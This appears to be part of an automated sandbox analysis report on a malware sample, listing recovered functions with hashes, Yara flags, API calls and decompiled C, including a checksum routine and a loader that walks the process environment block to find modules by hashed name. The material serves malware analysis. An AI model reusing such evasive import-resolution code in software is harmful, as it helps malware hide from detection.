                      • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                      • Instruction ID: 562ed277eeafd852baf3ed6db853e4c19c8da738cd60c41f05dc73f441d777a4
                      • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                      • Instruction Fuzzy Hash: B521D476A70AA367DB25CD78D8C83B163D0EF99B00F980634CF40C3696D278EA31D680
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 004029D4, Relevance: .1, Instructions: 77COMMONCrypto
                      Download Yara Rule
                      C-Code - Quality: 92%
                      			E004029D4(signed int _a28, signed int _a36, unsigned int _a40) {
				signed int _t26;
				signed int _t27;
				signed int _t28;
				signed int _t39;
				signed int _t47;
				unsigned int _t69;
				unsigned int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t75;
				signed int* _t76;

				asm("pushad");
				_t75 = _a36;
				_t69 = _a40;
				_t26 = 0;
				if(_t75 != 0) {
					_t27 = 0xffffffffffffffff;
					if(_t69 != 0) {
						while((_t75 & 0x00000003) != 0) {
							_t47 = _t27 ^  *_t75;
							_t75 = _t75 + 1;
							_t27 = _t47 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t47) * 4);
							_t69 = _t69 - 1;
							if(_t69 != 0) {
								continue;
							}
							break;
						}
						_t73 = _t69 & 0x00000007;
						_t70 = _t69 >> 3;
						while(_t70 != 0) {
							_t76 = _t75 + 4;
							_t39 = ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t27 ^  *_t75) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t27 ^  *_t75)) * 4))) * 4))) * 4))) * 4) ^  *_t76;
							_t75 =  &(_t76[1]);
							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
							_t70 = _t70 - 1;
						}
						_t71 = _t73;
						if(_t71 != 0) {
							do {
								_t28 = _t27 ^  *_t75;
								_t75 = _t75 + 1;
								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
								_t71 = _t71 - 1;
							} while (_t71 != 0);
						}
					}
					_t26 =  !_t27;
				}
				_a28 = _t26;
				asm("popad");
				return _t26;
			}














                      0x004029d4
                      0x004029d5
                      0x004029d9
                      0x004029e2
                      0x004029e6
                      0x004029ec
                      0x004029f1
                      0x004029f7
                      0x004029ff
                      0x00402a01
                      0x00402a0c
                      0x00402a0f
                      0x00402a10
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00402a10
                      0x00402a14
                      0x00402a17
                      0x00402a1a
                      0x00402a1e
                      0x00402a55
                      0x00402a57
                      0x00402a8b
                      0x00402a8e
                      0x00402a8e
                      0x00402a91
                      0x00402a95
                      0x00402a97
                      0x00402a97
                      0x00402a99
                      0x00402aa4
                      0x00402aa7
                      0x00402aa7
                      0x00402a97
                      0x00402a95
                      0x00402aaa
                      0x00402aaa
                      0x00402aac
                      0x00402ab0
                      0x00402ab1

                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                      • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                      • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                      • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00928E7B, Relevance: .1, Instructions: 61COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.664443157.0000000000928000.00000040.00000001.sdmp, Offset: 00928000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction ID: e1b870370ff4627d0e2898136e21354d195360445e9613ec4305b72751ae927e
                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                      • Instruction Fuzzy Hash: 55118272341110AFDB44EF55EC81FA773EAEB98320B2A8055ED04CB31ADA75EC02C760
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 002233CB, Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction ID: ed0012539459712541b5f78bc7de34f621e8ea4687590e555406e2c36c8655c3
                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction Fuzzy Hash: A001A272920214BBD721DFD8E881EAEF7F8EB45760F6141A9F90497201D635AE10DA60
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0040317B, Relevance: .0, Instructions: 46COMMON
                      Download Yara Rule
                      C-Code - Quality: 90%
                      			E0040317B(intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				void* __ecx;
				intOrPtr _t17;
				void* _t21;
				intOrPtr* _t23;
				void* _t26;
				void* _t28;
				intOrPtr* _t31;
				void* _t33;
				signed int _t34;

				_push(_t25);
				_t1 =  &_v8;
				 *_t1 = _v8 & 0x00000000;
				_t34 =  *_t1;
				_v8 =  *[fs:0x30];
				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
				_t31 = _t23;
				do {
					_v12 =  *((intOrPtr*)(_t31 + 0x18));
					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
					_pop(_t26);
					_t35 = _t28;
					if(_t28 == 0) {
						goto L3;
					} else {
						E004032EA(_t35, _t28, 0);
						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
						_t33 = _t33 + 0x14;
						if(_a4 == _t21) {
							_t17 = _v12;
						} else {
							goto L3;
						}
					}
					L5:
					return _t17;
					L3:
					_t31 =  *_t31;
				} while (_t23 != _t31);
				_t17 = 0;
				goto L5;
			}














                      0x0040317f
                      0x00403180
                      0x00403180
                      0x00403180
                      0x0040318d
                      0x00403196
                      0x00403199
                      0x0040319b
                      0x004031a1
                      0x004031a9
                      0x004031ab
                      0x004031ac
                      0x004031ae
                      0x00000000
                      0x004031b0
                      0x004031b3
                      0x004031c2
                      0x004031c7
                      0x004031cd
                      0x004031e0
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004031cd
                      0x004031d7
                      0x004031dd
                      0x004031cf
                      0x004031cf
                      0x004031d1
                      0x004031d5
                      0x00000000

                      Memory Dump Source
                      • Source File: 00000004.00000002.664285691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000004.00000002.664325277.000000000049B000.00000040.00020000.sdmp Download File
                      • Associated: 00000004.00000002.664330156.00000000004A0000.00000040.00020000.sdmp Download File
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                      • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                      • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00220D90, Relevance: .0, Instructions: 38COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                      • Instruction ID: 69e606d9c0802334ac9c6ebbe2e8100b6930642a7caac05eacd4c3881bef1d4d
                      • Opcode Fuzzy Hash: da1566a2f6af9372ef5ff0064129cc8c7bd33331f23317b37220a35c5510ad97
                      • Instruction Fuzzy Hash: 6CF0C877611514AFDB11CFA4D845BAD73F9FB85315F0445A4D806D7242D330E9418B50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0022459D, Relevance: 12.1, APIs: 8, Instructions: 135memorycomCOMMON
                      Download Yara Rule
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 002245DF
                      • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 002245F9
                      • VariantInit.OLEAUT32(?), ref: 00224614
                      • SysAllocString.OLEAUT32(?), ref: 0022461D
                      • SysAllocString.OLEAUT32(?), ref: 00224669
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AllocString$CreateInitInitializeInstanceVariant
                      • String ID:
                      • API String ID: 3142612389-0
                      • Opcode ID: 801e2b92af4e068e2500d06ec890c455c2e33c95400fcbe31e3e444cab2ae094
                      • Instruction ID: 7445e3816a8e586f8078341fc9d185d6621e6b0b2cc1dc20365a420270e3cc5f
                      • Opcode Fuzzy Hash: 801e2b92af4e068e2500d06ec890c455c2e33c95400fcbe31e3e444cab2ae094
                      • Instruction Fuzzy Hash: A3415971A1061AEBDB00EFE4EC84AEEBFB9FF49314F104069F904AB150DB719A55CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 00225067, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                      Download Yara Rule
                      APIs
                      • getaddrinfo.WS2_32(?,?,?,00000000), ref: 0022509F
                      • socket.WS2_32(?,?,?), ref: 002250CA
                      • FreeAddrInfoW.WS2_32(00000000), ref: 002250E0
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: AddrFreeInfogetaddrinfosocket
                      • String ID:
                      • API String ID: 3289331118-0
                      • Opcode ID: 501034e39646eae3bd78317b1afc8d3089a7d6114b3b030c76452554e1e7af80
                      • Instruction ID: 5d3900f1f424b84653d342ccb999bc05f8d895836df028c9fc98c390971fc99b
                      • Opcode Fuzzy Hash: 501034e39646eae3bd78317b1afc8d3089a7d6114b3b030c76452554e1e7af80
                      • Instruction Fuzzy Hash: BA219F7252092AFFCB105FE0EC49ADDBBB5FF08310F208569F545A1160DB318E749B94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 0022690F, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                      Download Yara Rule
                      APIs
                      • SetLastError.KERNEL32(00000534,?,002268E3,00000000,?), ref: 0022694B
                      • GetLastError.KERNEL32(?,002268E3,00000000,?), ref: 00226958
                      Strings
                      Memory Dump Source
                      • Source File: 00000004.00000002.664242686.0000000000220000.00000040.00000001.sdmp, Offset: 00220000, based on PE: false
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: h"$h"
                      • API String ID: 1452528299-2228881058
                      • Opcode ID: 79bcf7ced60dfb95193866f3fb7abd54ad86436b156aaa61155f147c64b085b9
                      • Instruction ID: c7899770f42b5b626c15df61e30e702414222345dcce4fc8c6e5b49a8602e730
                      • Opcode Fuzzy Hash: 79bcf7ced60dfb95193866f3fb7abd54ad86436b156aaa61155f147c64b085b9
                      • Instruction Fuzzy Hash: 5621A17352012ABE9B15AFE4ECC6DEF7B6CEF44380B500095B512A6041EE78DF108AB0
                      Uniqueness

                      Uniqueness Score: -1.00%